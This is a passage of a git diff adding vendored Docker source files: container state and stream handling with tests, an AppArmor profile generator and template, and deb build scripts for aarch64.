+func (container *Container) Reset(lock bool) { + if lock { + container.Lock() + defer container.Unlock() + } + + if err := container.CloseStreams(); err != nil { + logrus.Errorf("%s: %s", container.ID, err) + } + + // Re-create a brand new stdin pipe once the container exited + if container.Config.OpenStdin { + container.StreamConfig.NewInputPipes() + } + + if container.LogDriver != nil { + if container.LogCopier != nil { + exit := make(chan struct{}) + go func() { + container.LogCopier.Wait() + close(exit) + }() + select { + case <-time.After(loggerCloseTimeout): + logrus.Warn("Logger didn't exit in time: logs may be truncated") + case <-exit: + } + } + container.LogDriver.Close() + container.LogCopier = nil + container.LogDriver = nil + } +} diff --git a/vendor/github.com/docker/docker/container/mounts_unix.go b/vendor/github.com/docker/docker/container/mounts_unix.go new file mode 100644 index 0000000000..c52abed2dc --- /dev/null +++ b/vendor/github.com/docker/docker/container/mounts_unix.go @@ -0,0 +1,12 @@ +// +build !windows + +package container + +// Mount contains information for a mount operation. +type Mount struct { + Source string `json:"source"` + Destination string `json:"destination"` + Writable bool `json:"writable"` + Data string `json:"data"` + Propagation string `json:"mountpropagation"` +} diff --git a/vendor/github.com/docker/docker/container/mounts_windows.go b/vendor/github.com/docker/docker/container/mounts_windows.go new file mode 100644 index 0000000000..01b327f788 --- /dev/null +++ b/vendor/github.com/docker/docker/container/mounts_windows.go @@ -0,0 +1,8 @@ +package container + +// Mount contains information for a mount operation. 
+type Mount struct { + Source string `json:"source"` + Destination string `json:"destination"` + Writable bool `json:"writable"` +} diff --git a/vendor/github.com/docker/docker/container/state.go b/vendor/github.com/docker/docker/container/state.go new file mode 100644 index 0000000000..4dd2ecec69 --- /dev/null +++ b/vendor/github.com/docker/docker/container/state.go @@ -0,0 +1,343 @@ +package container + +import ( + "fmt" + "sync" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/go-units" +) + +// State holds the current container state, and has methods to get and +// set the state. Container has an embed, which allows all of the +// functions defined against State to run against Container. +type State struct { + sync.Mutex + // FIXME: Why do we have both paused and running if a + // container cannot be paused and running at the same time? + Running bool + Paused bool + Restarting bool + OOMKilled bool + RemovalInProgress bool // Not need for this to be persistent on disk. + Dead bool + Pid int + ExitCodeValue int `json:"ExitCode"` + ErrorMsg string `json:"Error"` // contains last known error when starting the container + StartedAt time.Time + FinishedAt time.Time + waitChan chan struct{} + Health *Health +} + +// StateStatus is used to return an error type implementing both +// exec.ExitCode and error. +// This type is needed as State include a sync.Mutex field which make +// copying it unsafe. +type StateStatus struct { + exitCode int + error string +} + +func newStateStatus(ec int, err string) *StateStatus { + return &StateStatus{ + exitCode: ec, + error: err, + } +} + +// ExitCode returns current exitcode for the state. +func (ss *StateStatus) ExitCode() int { + return ss.exitCode +} + +// Error returns current error for the state. +func (ss *StateStatus) Error() string { + return ss.error +} + +// NewState creates a default state object with a fresh channel for state changes. 
+func NewState() *State { + return &State{ + waitChan: make(chan struct{}), + } +} + +// String returns a human-readable description of the state +func (s *State) String() string { + if s.Running { + if s.Paused { + return fmt.Sprintf("Up %s (Paused)", units.HumanDuration(time.Now().UTC().Sub(s.StartedAt))) + } + if s.Restarting { + return fmt.Sprintf("Restarting (%d) %s ago", s.ExitCodeValue, units.HumanDuration(time.Now().UTC().Sub(s.FinishedAt))) + } + + if h := s.Health; h != nil { + return fmt.Sprintf("Up %s (%s)", units.HumanDuration(time.Now().UTC().Sub(s.StartedAt)), h.String()) + } + + return fmt.Sprintf("Up %s", units.HumanDuration(time.Now().UTC().Sub(s.StartedAt))) + } + + if s.RemovalInProgress { + return "Removal In Progress" + } + + if s.Dead { + return "Dead" + } + + if s.StartedAt.IsZero() { + return "Created" + } + + if s.FinishedAt.IsZero() { + return "" + } + + return fmt.Sprintf("Exited (%d) %s ago", s.ExitCodeValue, units.HumanDuration(time.Now().UTC().Sub(s.FinishedAt))) +} + +// HealthString returns a single string to describe health status. +func (s *State) HealthString() string { + if s.Health == nil { + return types.NoHealthcheck + } + + return s.Health.String() +} + +// IsValidHealthString checks if the provided string is a valid container health status or not. +func IsValidHealthString(s string) bool { + return s == types.Starting || + s == types.Healthy || + s == types.Unhealthy || + s == types.NoHealthcheck +} + +// StateString returns a single string to describe state +func (s *State) StateString() string { + if s.Running { + if s.Paused { + return "paused" + } + if s.Restarting { + return "restarting" + } + return "running" + } + + if s.RemovalInProgress { + return "removing" + } + + if s.Dead { + return "dead" + } + + if s.StartedAt.IsZero() { + return "created" + } + + return "exited" +} + +// IsValidStateString checks if the provided string is a valid container state or not. 
+func IsValidStateString(s string) bool { + if s != "paused" && + s != "restarting" && + s != "removing" && + s != "running" && + s != "dead" && + s != "created" && + s != "exited" { + return false + } + return true +} + +func wait(waitChan <-chan struct{}, timeout time.Duration) error { + if timeout < 0 { + <-waitChan + return nil + } + select { + case <-time.After(timeout): + return fmt.Errorf("Timed out: %v", timeout) + case <-waitChan: + return nil + } +} + +// WaitStop waits until state is stopped. If state already stopped it returns +// immediately. If you want wait forever you must supply negative timeout. +// Returns exit code, that was passed to SetStopped +func (s *State) WaitStop(timeout time.Duration) (int, error) { + s.Lock() + if !s.Running { + exitCode := s.ExitCodeValue + s.Unlock() + return exitCode, nil + } + waitChan := s.waitChan + s.Unlock() + if err := wait(waitChan, timeout); err != nil { + return -1, err + } + s.Lock() + defer s.Unlock() + return s.ExitCode(), nil +} + +// WaitWithContext waits for the container to stop. Optional context can be +// passed for canceling the request. +func (s *State) WaitWithContext(ctx context.Context) error { + // todo(tonistiigi): make other wait functions use this + s.Lock() + if !s.Running { + state := newStateStatus(s.ExitCode(), s.Error()) + defer s.Unlock() + if state.ExitCode() == 0 { + return nil + } + return state + } + waitChan := s.waitChan + s.Unlock() + select { + case <-waitChan: + s.Lock() + state := newStateStatus(s.ExitCode(), s.Error()) + s.Unlock() + if state.ExitCode() == 0 { + return nil + } + return state + case <-ctx.Done(): + return ctx.Err() + } +} + +// IsRunning returns whether the running flag is set. Used by Container to check whether a container is running. +func (s *State) IsRunning() bool { + s.Lock() + res := s.Running + s.Unlock() + return res +} + +// GetPID holds the process id of a container. 
+func (s *State) GetPID() int { + s.Lock() + res := s.Pid + s.Unlock() + return res +} + +// ExitCode returns current exitcode for the state. Take lock before if state +// may be shared. +func (s *State) ExitCode() int { + return s.ExitCodeValue +} + +// SetExitCode sets current exitcode for the state. Take lock before if state +// may be shared. +func (s *State) SetExitCode(ec int) { + s.ExitCodeValue = ec +} + +// SetRunning sets the state of the container to "running". +func (s *State) SetRunning(pid int, initial bool) { + s.ErrorMsg = "" + s.Running = true + s.Restarting = false + s.ExitCodeValue = 0 + s.Pid = pid + if initial { + s.StartedAt = time.Now().UTC() + } +} + +// SetStopped sets the container state to "stopped" without locking. +func (s *State) SetStopped(exitStatus *ExitStatus) { + s.Running = false + s.Paused = false + s.Restarting = false + s.Pid = 0 + s.FinishedAt = time.Now().UTC() + s.setFromExitStatus(exitStatus) + close(s.waitChan) // fire waiters for stop + s.waitChan = make(chan struct{}) +} + +// SetRestarting sets the container state to "restarting" without locking. +// It also sets the container PID to 0. +func (s *State) SetRestarting(exitStatus *ExitStatus) { + // we should consider the container running when it is restarting because of + // all the checks in docker around rm/stop/etc + s.Running = true + s.Restarting = true + s.Pid = 0 + s.FinishedAt = time.Now().UTC() + s.setFromExitStatus(exitStatus) + close(s.waitChan) // fire waiters for stop + s.waitChan = make(chan struct{}) +} + +// SetError sets the container's error state. This is useful when we want to +// know the error that occurred when container transits to another state +// when inspecting it +func (s *State) SetError(err error) { + s.ErrorMsg = err.Error() +} + +// IsPaused returns whether the container is paused or not. 
+func (s *State) IsPaused() bool { + s.Lock() + res := s.Paused + s.Unlock() + return res +} + +// IsRestarting returns whether the container is restarting or not. +func (s *State) IsRestarting() bool { + s.Lock() + res := s.Restarting + s.Unlock() + return res +} + +// SetRemovalInProgress sets the container state as being removed. +// It returns true if the container was already in that state. +func (s *State) SetRemovalInProgress() bool { + s.Lock() + defer s.Unlock() + if s.RemovalInProgress { + return true + } + s.RemovalInProgress = true + return false +} + +// ResetRemovalInProgress makes the RemovalInProgress state to false. +func (s *State) ResetRemovalInProgress() { + s.Lock() + s.RemovalInProgress = false + s.Unlock() +} + +// SetDead sets the container state to "dead" +func (s *State) SetDead() { + s.Lock() + s.Dead = true + s.Unlock() +} + +// Error returns current error for the state. +func (s *State) Error() string { + return s.ErrorMsg +} diff --git a/vendor/github.com/docker/docker/container/state_solaris.go b/vendor/github.com/docker/docker/container/state_solaris.go new file mode 100644 index 0000000000..1229650efa --- /dev/null +++ b/vendor/github.com/docker/docker/container/state_solaris.go @@ -0,0 +1,7 @@ +package container + +// setFromExitStatus is a platform specific helper function to set the state +// based on the ExitStatus structure. 
+func (s *State) setFromExitStatus(exitStatus *ExitStatus) { + s.ExitCodeValue = exitStatus.ExitCode +} diff --git a/vendor/github.com/docker/docker/container/state_test.go b/vendor/github.com/docker/docker/container/state_test.go new file mode 100644 index 0000000000..c9a7bb4b7b --- /dev/null +++ b/vendor/github.com/docker/docker/container/state_test.go @@ -0,0 +1,113 @@ +package container + +import ( + "sync/atomic" + "testing" + "time" + + "github.com/docker/docker/api/types" +) + +func TestIsValidHealthString(t *testing.T) { + contexts := []struct { + Health string + Expected bool + }{ + {types.Healthy, true}, + {types.Unhealthy, true}, + {types.Starting, true}, + {types.NoHealthcheck, true}, + {"fail", false}, + } + + for _, c := range contexts { + v := IsValidHealthString(c.Health) + if v != c.Expected { + t.Fatalf("Expected %t, but got %t", c.Expected, v) + } + } +} + +func TestStateRunStop(t *testing.T) { + s := NewState() + for i := 1; i < 3; i++ { // full lifecycle two times + s.Lock() + s.SetRunning(i+100, false) + s.Unlock() + + if !s.IsRunning() { + t.Fatal("State not running") + } + if s.Pid != i+100 { + t.Fatalf("Pid %v, expected %v", s.Pid, i+100) + } + if s.ExitCode() != 0 { + t.Fatalf("ExitCode %v, expected 0", s.ExitCode()) + } + + stopped := make(chan struct{}) + var exit int64 + go func() { + exitCode, _ := s.WaitStop(-1 * time.Second) + atomic.StoreInt64(&exit, int64(exitCode)) + close(stopped) + }() + s.Lock() + s.SetStopped(&ExitStatus{ExitCode: i}) + s.Unlock() + if s.IsRunning() { + t.Fatal("State is running") + } + if s.ExitCode() != i { + t.Fatalf("ExitCode %v, expected %v", s.ExitCode(), i) + } + if s.Pid != 0 { + t.Fatalf("Pid %v, expected 0", s.Pid) + } + select { + case <-time.After(100 * time.Millisecond): + t.Fatal("Stop callback doesn't fire in 100 milliseconds") + case <-stopped: + t.Log("Stop callback fired") + } + exitCode := int(atomic.LoadInt64(&exit)) + if exitCode != i { + t.Fatalf("ExitCode %v, expected %v", exitCode, i) + 
} + if exitCode, err := s.WaitStop(-1 * time.Second); err != nil || exitCode != i { + t.Fatalf("WaitStop returned exitCode: %v, err: %v, expected exitCode: %v, err: %v", exitCode, err, i, nil) + } + } +} + +func TestStateTimeoutWait(t *testing.T) { + s := NewState() + stopped := make(chan struct{}) + go func() { + s.WaitStop(100 * time.Millisecond) + close(stopped) + }() + select { + case <-time.After(200 * time.Millisecond): + t.Fatal("Stop callback doesn't fire in 200 milliseconds") + case <-stopped: + t.Log("Stop callback fired") + } + + s.Lock() + s.SetStopped(&ExitStatus{ExitCode: 1}) + s.Unlock() + + stopped = make(chan struct{}) + go func() { + s.WaitStop(100 * time.Millisecond) + close(stopped) + }() + select { + case <-time.After(200 * time.Millisecond): + t.Fatal("Stop callback doesn't fire in 100 milliseconds") + case <-stopped: + t.Log("Stop callback fired") + } + +} diff --git a/vendor/github.com/docker/docker/container/state_unix.go b/vendor/github.com/docker/docker/container/state_unix.go new file mode 100644 index 0000000000..a2fa5afc28 --- /dev/null +++ b/vendor/github.com/docker/docker/container/state_unix.go @@ -0,0 +1,10 @@ +// +build linux freebsd + +package container + +// setFromExitStatus is a platform specific helper function to set the state +// based on the ExitStatus structure. +func (s *State) setFromExitStatus(exitStatus *ExitStatus) { + s.ExitCodeValue = exitStatus.ExitCode + s.OOMKilled = exitStatus.OOMKilled +} diff --git a/vendor/github.com/docker/docker/container/state_windows.go b/vendor/github.com/docker/docker/container/state_windows.go new file mode 100644 index 0000000000..1229650efa --- /dev/null +++ b/vendor/github.com/docker/docker/container/state_windows.go @@ -0,0 +1,7 @@ +package container + +// setFromExitStatus is a platform specific helper function to set the state +// based on the ExitStatus structure. 
+func (s *State) setFromExitStatus(exitStatus *ExitStatus) { + s.ExitCodeValue = exitStatus.ExitCode +} diff --git a/vendor/github.com/docker/docker/container/store.go b/vendor/github.com/docker/docker/container/store.go new file mode 100644 index 0000000000..042fb1a349 --- /dev/null +++ b/vendor/github.com/docker/docker/container/store.go @@ -0,0 +1,28 @@ +package container + +// StoreFilter defines a function to filter +// container in the store. +type StoreFilter func(*Container) bool + +// StoreReducer defines a function to +// manipulate containers in the store +type StoreReducer func(*Container) + +// Store defines an interface that +// any container store must implement. +type Store interface { + // Add appends a new container to the store. + Add(string, *Container) + // Get returns a container from the store by the identifier it was stored with. + Get(string) *Container + // Delete removes a container from the store by the identifier it was stored with. + Delete(string) + // List returns a list of containers from the store. + List() []*Container + // Size returns the number of containers in the store. + Size() int + // First returns the first container found in the store by a given filter. + First(StoreFilter) *Container + // ApplyAll calls the reducer function with every container in the store. + ApplyAll(StoreReducer) +} diff --git a/vendor/github.com/docker/docker/container/stream/streams.go b/vendor/github.com/docker/docker/container/stream/streams.go new file mode 100644 index 0000000000..79f366afda --- /dev/null +++ b/vendor/github.com/docker/docker/container/stream/streams.go @@ -0,0 +1,143 @@ +package stream + +import ( + "fmt" + "io" + "io/ioutil" + "strings" + "sync" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/pkg/broadcaster" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/pools" +) + +// Config holds information about I/O streams managed together. 
+// +// config.StdinPipe returns a WriteCloser which can be used to feed data +// to the standard input of the streamConfig's active process. +// config.StdoutPipe and streamConfig.StderrPipe each return a ReadCloser +// which can be used to retrieve the standard output (and error) generated +// by the container's active process. The output (and error) are actually +// copied and delivered to all StdoutPipe and StderrPipe consumers, using +// a kind of "broadcaster". +type Config struct { + sync.WaitGroup + stdout *broadcaster.Unbuffered + stderr *broadcaster.Unbuffered + stdin io.ReadCloser + stdinPipe io.WriteCloser +} + +// NewConfig creates a stream config and initializes +// the standard err and standard out to new unbuffered broadcasters. +func NewConfig() *Config { + return &Config{ + stderr: new(broadcaster.Unbuffered), + stdout: new(broadcaster.Unbuffered), + } +} + +// Stdout returns the standard output in the configuration. +func (c *Config) Stdout() *broadcaster.Unbuffered { + return c.stdout +} + +// Stderr returns the standard error in the configuration. +func (c *Config) Stderr() *broadcaster.Unbuffered { + return c.stderr +} + +// Stdin returns the standard input in the configuration. +func (c *Config) Stdin() io.ReadCloser { + return c.stdin +} + +// StdinPipe returns an input writer pipe as an io.WriteCloser. +func (c *Config) StdinPipe() io.WriteCloser { + return c.stdinPipe +} + +// StdoutPipe creates a new io.ReadCloser with an empty bytes pipe. +// It adds this new out pipe to the Stdout broadcaster. +func (c *Config) StdoutPipe() io.ReadCloser { + bytesPipe := ioutils.NewBytesPipe() + c.stdout.Add(bytesPipe) + return bytesPipe +} + +// StderrPipe creates a new io.ReadCloser with an empty bytes pipe. +// It adds this new err pipe to the Stderr broadcaster. 
+func (c *Config) StderrPipe() io.ReadCloser { + bytesPipe := ioutils.NewBytesPipe() + c.stderr.Add(bytesPipe) + return bytesPipe +} + +// NewInputPipes creates new pipes for both standard inputs, Stdin and StdinPipe. +func (c *Config) NewInputPipes() { + c.stdin, c.stdinPipe = io.Pipe() +} + +// NewNopInputPipe creates a new input pipe that will silently drop all messages in the input. +func (c *Config) NewNopInputPipe() { + c.stdinPipe = ioutils.NopWriteCloser(ioutil.Discard) +} + +// CloseStreams ensures that the configured streams are properly closed. +func (c *Config) CloseStreams() error { + var errors []string + + if c.stdin != nil { + if err := c.stdin.Close(); err != nil { + errors = append(errors, fmt.Sprintf("error close stdin: %s", err)) + } + } + + if err := c.stdout.Clean(); err != nil { + errors = append(errors, fmt.Sprintf("error close stdout: %s", err)) + } + + if err := c.stderr.Clean(); err != nil { + errors = append(errors, fmt.Sprintf("error close stderr: %s", err)) + } + + if len(errors) > 0 { + return fmt.Errorf(strings.Join(errors, "\n")) + } + + return nil +} + +// CopyToPipe connects streamconfig with a libcontainerd.IOPipe +func (c *Config) CopyToPipe(iop libcontainerd.IOPipe) { + copyFunc := func(w io.Writer, r io.Reader) { + c.Add(1) + go func() { + if _, err := pools.Copy(w, r); err != nil { + logrus.Errorf("stream copy error: %+v", err) + } + c.Done() + }() + } + + if iop.Stdout != nil { + copyFunc(c.Stdout(), iop.Stdout) + } + if iop.Stderr != nil { + copyFunc(c.Stderr(), iop.Stderr) + } + + if stdin := c.Stdin(); stdin != nil { + if iop.Stdin != nil { + go func() { + pools.Copy(iop.Stdin, stdin) + if err := iop.Stdin.Close(); err != nil { + logrus.Warnf("failed to close stdin: %+v", err) + } + }() + } + } +} diff --git a/vendor/github.com/docker/docker/contrib/README.md b/vendor/github.com/docker/docker/contrib/README.md new file mode 100644 index 0000000000..92b1d94433 --- /dev/null +++ 
b/vendor/github.com/docker/docker/contrib/README.md @@ -0,0 +1,4 @@ +The `contrib` directory contains scripts, images, and other helpful things +which are not part of the core docker distribution. Please note that they +could be out of date, since they do not receive the same attention as the +rest of the repository. diff --git a/vendor/github.com/docker/docker/contrib/REVIEWERS b/vendor/github.com/docker/docker/contrib/REVIEWERS new file mode 100644 index 0000000000..18e05a3070 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/REVIEWERS @@ -0,0 +1 @@ +Tianon Gravi (@tianon) diff --git a/vendor/github.com/docker/docker/contrib/apparmor/main.go b/vendor/github.com/docker/docker/contrib/apparmor/main.go new file mode 100644 index 0000000000..f4a2978b86 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/apparmor/main.go @@ -0,0 +1,56 @@ +package main + +import ( + "fmt" + "log" + "os" + "path" + "text/template" + + "github.com/docker/docker/pkg/aaparser" +) + +type profileData struct { + Version int +} + +func main() { + if len(os.Args) < 2 { + log.Fatal("pass a filename to save the profile in.") + } + + // parse the arg + apparmorProfilePath := os.Args[1] + + version, err := aaparser.GetVersion() + if err != nil { + log.Fatal(err) + } + data := profileData{ + Version: version, + } + fmt.Printf("apparmor_parser is of version %+v\n", data) + + // parse the template + compiled, err := template.New("apparmor_profile").Parse(dockerProfileTemplate) + if err != nil { + log.Fatalf("parsing template failed: %v", err) + } + + // make sure /etc/apparmor.d exists + if err := os.MkdirAll(path.Dir(apparmorProfilePath), 0755); err != nil { + log.Fatal(err) + } + + f, err := os.OpenFile(apparmorProfilePath, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0644) + if err != nil { + log.Fatal(err) + } + defer f.Close() + + if err := compiled.Execute(f, data); err != nil { + log.Fatalf("executing template failed: %v", err) + } + + fmt.Printf("created apparmor profile for version 
%+v at %q\n", data, apparmorProfilePath) +} diff --git a/vendor/github.com/docker/docker/contrib/apparmor/template.go b/vendor/github.com/docker/docker/contrib/apparmor/template.go new file mode 100644 index 0000000000..e5e1c8bed6 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/apparmor/template.go @@ -0,0 +1,268 @@ +package main + +const dockerProfileTemplate = `@{DOCKER_GRAPH_PATH}=/var/lib/docker + +profile /usr/bin/docker (attach_disconnected, complain) { + # Prevent following links to these files during container setup. + deny /etc/** mkl, + deny /dev/** kl, + deny /sys/** mkl, + deny /proc/** mkl, + + mount -> @{DOCKER_GRAPH_PATH}/**, + mount -> /, + mount -> /proc/**, + mount -> /sys/**, + mount -> /run/docker/netns/**, + mount -> /.pivot_root[0-9]*/, + + / r, + + umount, + pivot_root, +{{if ge .Version 209000}} + signal (receive) peer=@{profile_name}, + signal (receive) peer=unconfined, + signal (send), +{{end}} + network, + capability, + owner /** rw, + @{DOCKER_GRAPH_PATH}/** rwl, + @{DOCKER_GRAPH_PATH}/linkgraph.db k, + @{DOCKER_GRAPH_PATH}/network/files/boltdb.db k, + @{DOCKER_GRAPH_PATH}/network/files/local-kv.db k, + @{DOCKER_GRAPH_PATH}/[0-9]*.[0-9]*/linkgraph.db k, + + # For non-root client use: + /dev/urandom r, + /dev/null rw, + /dev/pts/[0-9]* rw, + /run/docker.sock rw, + /proc/** r, + /proc/[0-9]*/attr/exec w, + /sys/kernel/mm/hugepages/ r, + /etc/localtime r, + /etc/ld.so.cache r, + /etc/passwd r, + +{{if ge .Version 209000}} + ptrace peer=@{profile_name}, + ptrace (read) peer=docker-default, + deny ptrace (trace) peer=docker-default, + deny ptrace peer=/usr/bin/docker///bin/ps, +{{end}} + + /usr/lib/** rm, + /lib/** rm, + + /usr/bin/docker pix, + /sbin/xtables-multi rCx, + /sbin/iptables rCx, + /sbin/modprobe rCx, + /sbin/auplink rCx, + /sbin/mke2fs rCx, + /sbin/tune2fs rCx, + /sbin/blkid rCx, + /bin/kmod rCx, + /usr/bin/xz rCx, + /bin/ps rCx, + /bin/tar rCx, + /bin/cat rCx, + /sbin/zfs rCx, + /sbin/apparmor_parser rCx, + +{{if ge 
.Version 209000}} + # Transitions + change_profile -> docker-*, + change_profile -> unconfined, +{{end}} + + profile /bin/cat (complain) { + /etc/ld.so.cache r, + /lib/** rm, + /dev/null rw, + /proc r, + /bin/cat mr, + + # For reading in 'docker stats': + /proc/[0-9]*/net/dev r, + } + profile /bin/ps (complain) { + /etc/ld.so.cache r, + /etc/localtime r, + /etc/passwd r, + /etc/nsswitch.conf r, + /lib/** rm, + /proc/[0-9]*/** r, + /dev/null rw, + /bin/ps mr, + +{{if ge .Version 209000}} + # We don't need ptrace so we'll deny and ignore the error. + deny ptrace (read, trace), +{{end}} + + # Quiet dac_override denials + deny capability dac_override, + deny capability dac_read_search, + deny capability sys_ptrace, + + /dev/tty r, + /proc/stat r, + /proc/cpuinfo r, + /proc/meminfo r, + /proc/uptime r, + /sys/devices/system/cpu/online r, + /proc/sys/kernel/pid_max r, + /proc/ r, + /proc/tty/drivers r, + } + profile /sbin/iptables (complain) { +{{if ge .Version 209000}} + signal (receive) peer=/usr/bin/docker, +{{end}} + capability net_admin, + } + profile /sbin/auplink flags=(attach_disconnected, complain) { +{{if ge .Version 209000}} + signal (receive) peer=/usr/bin/docker, +{{end}} + capability sys_admin, + capability dac_override, + + @{DOCKER_GRAPH_PATH}/aufs/** rw, + @{DOCKER_GRAPH_PATH}/tmp/** rw, + # For user namespaces: + @{DOCKER_GRAPH_PATH}/[0-9]*.[0-9]*/** rw, + + /sys/fs/aufs/** r, + /lib/** rm, + /apparmor/.null r, + /dev/null rw, + /etc/ld.so.cache r, + /sbin/auplink rm, + /proc/fs/aufs/** rw, + /proc/[0-9]*/mounts rw, + } + profile /sbin/modprobe /bin/kmod (complain) { +{{if ge .Version 209000}} + signal (receive) peer=/usr/bin/docker, +{{end}} + capability sys_module, + /etc/ld.so.cache r, + /lib/** rm, + /dev/null rw, + /apparmor/.null rw, + /sbin/modprobe rm, + /bin/kmod rm, + /proc/cmdline r, + /sys/module/** r, + /etc/modprobe.d{/,/**} r, + } + # xz works via pipes, so we do not need access to the filesystem. 
+ profile /usr/bin/xz (complain) { +{{if ge .Version 209000}} + signal (receive) peer=/usr/bin/docker, +{{end}} + /etc/ld.so.cache r, + /lib/** rm, + /usr/bin/xz rm, + deny /proc/** rw, + deny /sys/** rw, + } + profile /sbin/xtables-multi (attach_disconnected, complain) { + /etc/ld.so.cache r, + /lib/** rm, + /sbin/xtables-multi rm, + /apparmor/.null w, + /dev/null rw, + + /proc r, + + capability net_raw, + capability net_admin, + network raw, + } + profile /sbin/zfs (attach_disconnected, complain) { + file, + capability, + } + profile /sbin/mke2fs (complain) { + /sbin/mke2fs rm, + + /lib/** rm, + + /apparmor/.null w, + + /etc/ld.so.cache r, + /etc/mke2fs.conf r, + /etc/mtab r, + + /dev/dm-* rw, + /dev/urandom r, + /dev/null rw, + + /proc/swaps r, + /proc/[0-9]*/mounts r, + } + profile /sbin/tune2fs (complain) { + /sbin/tune2fs rm, + + /lib/** rm, + + /apparmor/.null w, + + /etc/blkid.conf r, + /etc/mtab r, + /etc/ld.so.cache r, + + /dev/null rw, + /dev/.blkid.tab r, + /dev/dm-* rw, + + /proc/swaps r, + /proc/[0-9]*/mounts r, + } + profile /sbin/blkid (complain) { + /sbin/blkid rm, + + /lib/** rm, + /apparmor/.null w, + + /etc/ld.so.cache r, + /etc/blkid.conf r, + + /dev/null rw, + /dev/.blkid.tab rl, + /dev/.blkid.tab* rwl, + /dev/dm-* r, + + /sys/devices/virtual/block/** r, + + capability mknod, + + mount -> @{DOCKER_GRAPH_PATH}/**, + } + profile /sbin/apparmor_parser (complain) { + /sbin/apparmor_parser rm, + + /lib/** rm, + + /etc/ld.so.cache r, + /etc/apparmor/** r, + /etc/apparmor.d/** r, + /etc/apparmor.d/cache/** w, + + /dev/null rw, + + /sys/kernel/security/apparmor/** r, + /sys/kernel/security/apparmor/.replace w, + + /proc/[0-9]*/mounts r, + /proc/sys/kernel/osrelease r, + /proc r, + + capability mac_admin, + } +}` diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/build.sh b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/build.sh new file mode 100755 index 0000000000..8271d9dc47 --- /dev/null +++ 
b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/build.sh @@ -0,0 +1,10 @@ +#!/bin/bash +set -e + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" + +set -x +./generate.sh +for d in */; do + docker build -t "dockercore/builder-deb:$(basename "$d")" "$d" +done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/generate.sh new file mode 100755 index 0000000000..b5040b709a --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/generate.sh @@ -0,0 +1,118 @@ +#!/bin/bash +set -e + +# This file is used to auto-generate Dockerfiles for making debs via 'make deb' +# +# usage: ./generate.sh [versions] +# ie: ./generate.sh +# to update all Dockerfiles in this directory +# or: ./generate.sh ubuntu-trusty +# to only update ubuntu-trusty/Dockerfile +# or: ./generate.sh ubuntu-newversion +# to create a new folder and a Dockerfile within it +# +# Note: non-LTS versions are not guaranteed to work. + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" + +versions=( "$@" ) +if [ ${#versions[@]} -eq 0 ]; then + versions=( */ ) +fi +versions=( "${versions[@]%/}" ) + +for version in "${versions[@]}"; do + echo "${versions[@]}" + distro="${version%-*}" + suite="${version##*-}" + from="aarch64/${distro}:${suite}" + + mkdir -p "$version" + echo "$version -> FROM $from" + cat > "$version/Dockerfile" <<-EOF + # + # THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/aarch64/generate.sh"! 
+ # + + FROM $from + + EOF + + dockerBuildTags='apparmor pkcs11 selinux' + runcBuildTags='apparmor selinux' + + # this list is sorted alphabetically; please keep it that way + packages=( + apparmor # for apparmor_parser for testing the profile + bash-completion # for bash-completion debhelper integration + btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible) + build-essential # "essential for building Debian packages" + cmake # tini dep + curl ca-certificates # for downloading Go + debhelper # for easy ".deb" building + dh-apparmor # for apparmor debhelper + dh-systemd # for systemd debhelper integration + git # for "git commit" info in "docker -v" + libapparmor-dev # for "sys/apparmor.h" + libdevmapper-dev # for "libdevmapper.h" + libltdl-dev # for pkcs11 "ltdl.h" + libsqlite3-dev # for "sqlite3.h" + pkg-config # for detecting things like libsystemd-journal dynamically + vim-common # tini dep + ) + + case "$suite" in + trusty) + packages+=( libsystemd-journal-dev ) + # aarch64 doesn't have an official downloadable binary for go. + # And gccgo for trusty only includes Go 1.2 implementation which + # is too old to build current go source, fortunately trusty has + # golang-1.6-go package can be used as bootstrap. 
+ packages+=( golang-1.6-go ) + ;; + xenial) + packages+=( libsystemd-dev ) + packages+=( golang-go libseccomp-dev) + + dockerBuildTags="$dockerBuildTags seccomp" + runcBuildTags="$runcBuildTags seccomp" + ;; + *) + echo "Unsupported distro:" $distro:$suite + rm -fr "$version" + exit 1 + ;; + esac + + # update and install packages + echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" + echo >> "$version/Dockerfile" + + case "$suite" in + trusty) + echo 'RUN update-alternatives --install /usr/bin/go go /usr/lib/go-1.6/bin/go 100' >> "$version/Dockerfile" + echo >> "$version/Dockerfile" + ;; + *) + ;; + esac + + echo "# Install Go" >> "$version/Dockerfile" + echo "# aarch64 doesn't have official go binaries, so use the version of go installed from" >> "$version/Dockerfile" + echo "# the image to build go from source." >> "$version/Dockerfile" + + awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile.aarch64 >> "$version/Dockerfile" + echo 'RUN mkdir /usr/src/go && curl -fsSL https://golang.org/dl/go${GO_VERSION}.src.tar.gz | tar -v -C /usr/src/go -xz --strip-components=1 \' >> "$version/Dockerfile" + echo ' && cd /usr/src/go/src \' >> "$version/Dockerfile" + echo ' && GOOS=linux GOARCH=arm64 GOROOT_BOOTSTRAP="$(go env GOROOT)" ./make.bash' >> "$version/Dockerfile" + echo >> "$version/Dockerfile" + + echo 'ENV PATH $PATH:/usr/src/go/bin' >> "$version/Dockerfile" + echo >> "$version/Dockerfile" + + echo "ENV AUTO_GOPATH 1" >> "$version/Dockerfile" + echo >> "$version/Dockerfile" + + echo "ENV DOCKER_BUILDTAGS $dockerBuildTags" >> "$version/Dockerfile" + echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile" +done diff --git 